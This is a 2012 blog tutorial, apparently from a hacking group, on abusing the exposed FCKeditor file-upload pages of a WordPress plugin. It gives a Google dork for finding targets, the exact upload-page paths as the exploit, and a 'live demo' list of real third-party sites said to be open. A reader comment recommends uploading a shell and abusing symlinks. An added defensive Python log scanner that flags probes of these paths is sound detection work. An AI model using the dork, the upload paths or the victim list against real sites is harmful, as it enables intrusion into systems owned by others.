Wednesday, 29 August 2012

New Wordpress FCKeditor File Upload Vulnerability


Assalamualaikum and greetings. Sorry that it has been a while since I wrote a tutorial entry. I was busy celebrating Raya! hoho xD
Right, in this entry I want to share with you a new FCKeditor exploit for WordPress. There was already one before this, right? But this one is a different one :)

1. First, search with this Google dork:
inurl:"wp-content/plugins/fckeditor"


2. Pick one of the websites in the results and enter one of the exploits below:

Exploit :
  • http://target.com/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
  • http://target.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

3. The link to the file will be given after the upload.

Live demo :

http://rentanice.com/booking/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://sainttimothy.org/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://lifesaving.ca/blog/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://knike.fmf-radio.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
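For a site owner checking whether the two file-manager pages above were requested on their own server, and whether they were still reachable, the following is an added example that is not part of the original post. It scans access-log lines in common/combined format; the log lines, the finding labels and the `example-endpoint` path are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Paths named in the post, relative to the WordPress root.
FILEMANAGER_PREFIX = "wp-content/plugins/fckeditor/editor/filemanager/"
TEST_PAGES = ("browser/default/browser.html", "connectors/uploadtest.html")

# Common/combined log format: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(method, path, status):
    """Return a finding label for one request, or None if it is unrelated."""
    path = unquote(path.split("?", 1)[0]).lower()
    idx = path.find(FILEMANAGER_PREFIX)
    if idx == -1:
        return None
    rest = path[idx + len(FILEMANAGER_PREFIX):]
    ok = 200 <= status < 300
    if method == "POST":  # any POST under the file manager is worth a look
        return "upload-accepted" if ok else "upload-rejected"
    if rest in TEST_PAGES:  # a 2xx means the page is still served
        return "test-page-exposed" if ok else "test-page-probe"
    return "filemanager-access" if ok else "filemanager-probe"

def scan(lines):
    """Group (client ip, requested path) pairs by finding label."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m["method"], m["path"], int(m["status"]))
        if label:
            findings[label].append((m["ip"], m["path"]))
    return dict(findings)

# Constructed sample log lines (documentation IP ranges, hypothetical endpoint).
P = "/wp-content/plugins/fckeditor/editor/filemanager/"
SAMPLE_LOG = [
    f'192.0.2.10 - - [29/Aug/2012:10:01:02 +0000] "GET {P}browser/default/browser.html HTTP/1.1" 200 5120',
    f'192.0.2.10 - - [29/Aug/2012:10:01:40 +0000] "POST {P}connectors/example-endpoint HTTP/1.1" 200 310',
    f'198.51.100.7 - - [29/Aug/2012:11:15:09 +0000] "GET /blog{P}connectors/uploadtest.html HTTP/1.1" 404 209',
    '203.0.113.5 - - [29/Aug/2012:11:20:00 +0000] "GET /index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for label, hits in scan(SAMPLE_LOG).items():
        print(label, hits)
```

A `test-page-exposed` or `upload-accepted` finding means the plugin's file manager is still reachable and should be removed or access-restricted; `test-page-probe` entries are requests that already receive a 404.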

That's all for this entry. Assalamualaikum.



3 comments:

  1. ‎404 Error File Not Found

    The page you are looking for might have been removed,
    had its name changed, or is temporarily unavailable.

  2. Not every site can be accessed. That means the admin has already patched the vuln, that's why it's not found :)

  3. If a shell can be uploaded... symlink till you're full. keke



© 2011 - Reaperz All rights reserved